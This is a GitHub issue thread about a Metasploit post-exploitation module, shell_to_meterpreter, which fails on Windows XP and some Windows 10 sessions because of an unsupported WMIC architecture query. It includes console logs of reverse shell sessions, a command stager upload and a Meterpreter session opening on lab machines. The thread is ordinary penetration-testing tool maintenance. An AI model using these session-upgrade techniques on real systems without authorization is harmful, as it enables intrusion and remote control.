Closed bcoles closed 1 year ago
same here
Same here. Any news?
Looking here https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb
At line 88, not sure if the syntax is correct.
Yep,, getting the same issue while upgrading shell to meterpeter
any solutions???
Cross-referencing: https://github.com/rapid7/metasploit-framework/pull/17336 - potentially better OS architecture detection would be a good follow on from the OS version detection API PR
same.
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsoft Windows [_ 10.0.19 192.168.1.1:7777 -> 192.168.1.1:33333
045.2965] (c) Microsoft Corporatio... (192.168.1.1)
Also occurred on windows10 1903.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsof 10.65.106.99:4444 -> 10
t Windows [_ 10.0.1836 .65.106.99:47773 (172.1
2.30] ----- 6.1.139)
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
Vulnerable target env is windows 10 1903(CVE-2020-0796)
msf6 post(multi/manage/shell_to_meterpreter) > sessions 5
[*] Starting interaction with 5...
Shell Banner:
Microsoft Windows [_ 10.0.18362.30]
-----
C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo
������: DESKTOP-O0U77NO
OS ����: Microsoft Windows 10 רҵ��
OS �汾: 10.0.18362 ��ȱ Build 18362
OS ������: Microsoft Corporation
OS ����: ��������վ
OS ��������: Multiprocessor Free
Also occurred on windows10 1903.
This is a different issue. #17896
Looks like this issue can be closed now, it was resolved by https://github.com/rapid7/metasploit-framework/pull/18062 which no longer uses wmic and currently detects the target architecture:
Target:
msf6 payload(windows/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
Shell Banner:
'\\vmware-host\Shared Folders\Desktop'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
-----
C:\WINDOWS>systeminfo
systeminfo
Host Name: ZACH-F90A9C7F47
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Module working:
msf6 payload(windows/shell/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.1:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
.... etc etc....
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (175686 bytes) to 192.168.2.135
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf6 payload(windows/shell/reverse_tcp) >
[*] Meterpreter session 3 opened (192.168.2.1:4433 -> 192.168.2.135:1163) at 2023-10-23 10:32:18 -0500
Works as expected with the ENV detection:
post/multi/manage/shell_to_meterpreter
fails on Windows XP SP3 x86 over awindows/shell/reverse_tcp
session. Meterpreter supports Windows XP SP3.Since #15864,
shell_to_meterpreter
attempts to usewmic os get osarchitecture
which is not a valid WMIC query on XP SP3.https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100